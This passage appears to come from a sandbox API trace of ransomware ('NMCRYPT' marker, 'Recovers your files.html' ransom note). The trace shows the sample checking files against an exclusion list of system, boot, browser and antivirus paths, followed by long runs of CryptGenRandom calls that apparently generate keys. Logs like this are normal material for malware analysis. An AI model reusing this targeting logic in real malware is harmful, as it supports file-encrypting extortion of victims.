(pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", pszSpec="*pagefile.sys*") returned 0 [0161.248] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", pszSpec="*NTUSER.DAT*") returned 0 [0161.248] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", pszSpec="*AppData*") returned 0 [0161.248] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", pszSpec="*\\winrar\\*") returned 0 [0161.248] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0161.249] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", pszSpec="*\\java\\*") returned 0 [0161.249] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0161.249] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", pszSpec="*\\windows\\*") returned 0 [0161.249] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", pszSpec="*\\ESET\\*") returned 0 [0161.249] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", pszSpec="*\\AVG\\*") returned 0 [0161.249] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", pszSpec="*\\AVIRA\\*") returned 0 [0161.249] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0161.249] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", pszSpec="*Atheros*") returned 0 [0161.249] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", pszSpec="*Realtek*") returned 0 [0161.249] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", pszSpec="*bootmgr*") returned 0 [0161.249] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", pszSpec="*boot*") returned 0 [0161.249] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", pszSpec="*boot*") returned 0 [0161.249] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", pszSpec="*CONFIG.SYS*") returned 0 [0161.249] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", pszSpec="*IO.SYS*") returned 0 [0161.249] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", pszSpec="*MSDOS.SYS*") returned 0 [0161.249] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", pszSpec="*NTDETECT.COM*") returned 0 [0161.249] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", pszSpec="*ntldr*") returned 0 [0161.249] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", pszSpec="*chrome*") returned 0 [0161.249] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", pszSpec="*opera*") returned 0 [0161.249] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", pszSpec="*firefox*") returned 0 [0161.249] wcslen (_String="\\\\?\\") returned 0x4 [0161.249] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad278 [0161.249] wcscmp (_String1=".", _String2=".") returned 0 [0161.249] FindNextFileW (in: hFindFile=0x9ad278, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0161.249] wcscmp (_String1="..", _String2=".") returned 1 [0161.249] wcscmp (_String1="..", _String2="..") returned 0 [0161.249] FindNextFileW (in: hFindFile=0x9ad278, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0161.249] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0161.249] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0161.249] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0161.249] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0161.249] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0161.249] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0161.249] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0161.249] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0161.249] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0161.249] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0161.249] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0161.249] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0161.249] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0161.249] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0161.250] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0161.250] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0161.250] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0161.250] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0161.250] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0161.250] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0161.250] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0161.250] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0161.250] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0161.250] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0161.250] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0161.250] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0161.250] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0161.250] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0161.250] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0161.250] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0161.250] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0161.250] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0161.250] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0161.250] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0161.250] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui", pszSpec="*") returned 1 [0161.250] strlen (_Str="NMoreira") returned 0x8 [0161.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.250] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.251] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.252] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.253] CryptGenRandom (in: hProv=0x8bf310, 